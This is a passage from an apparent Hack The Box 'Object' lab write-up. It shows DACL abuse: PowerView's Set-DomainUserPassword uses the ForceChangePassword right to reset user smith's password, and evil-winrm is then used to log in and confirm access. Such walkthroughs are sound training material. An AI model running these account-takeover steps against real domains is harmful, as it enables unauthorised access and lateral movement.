ForceChangePassword


Following up the Help section of BloodHound on the ForceChangePassword privilege Since the current PowerShell session is already authenticated with the credential of the oliver user, it is unnecessary to create a PSCredential object

*evil-winrm* ps c:\tmp> $UserPassword = ConvertTo-SecureString 'Qwer1234' -AsPlainText -Force

However, I still do need to create a $UserPassword object

*evil-winrm* ps c:\tmp> Set-DomainUserPassword -Identity smith -AccountPassword $UserPassword

Now changing the password of the smith user to Qwer1234

WinRM


┌──(kali㉿kali)-[~/archive/htb/labs/object]
└─$ evil-winrm -i jenkins.object.local -u smith -p 'Qwer1234'
 
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
 
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\smith\Documents> whoami
object\smith
*Evil-WinRM* PS C:\Users\smith\Documents> hostname
jenkins
*Evil-WinRM* PS C:\Users\smith\Documents> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0:
 
   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::20c
   IPv6 Address. . . . . . . . . . . : dead:beef::f00b:8831:17ef:6c30
   Link-local IPv6 Address . . . . . : fe80::f00b:8831:17ef:6c30%12
   IPv4 Address. . . . . . . . . . . : 10.10.11.132
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:d784%12
                                       10.10.10.2

Lateral Movement made to the smith user via DACL_Abuse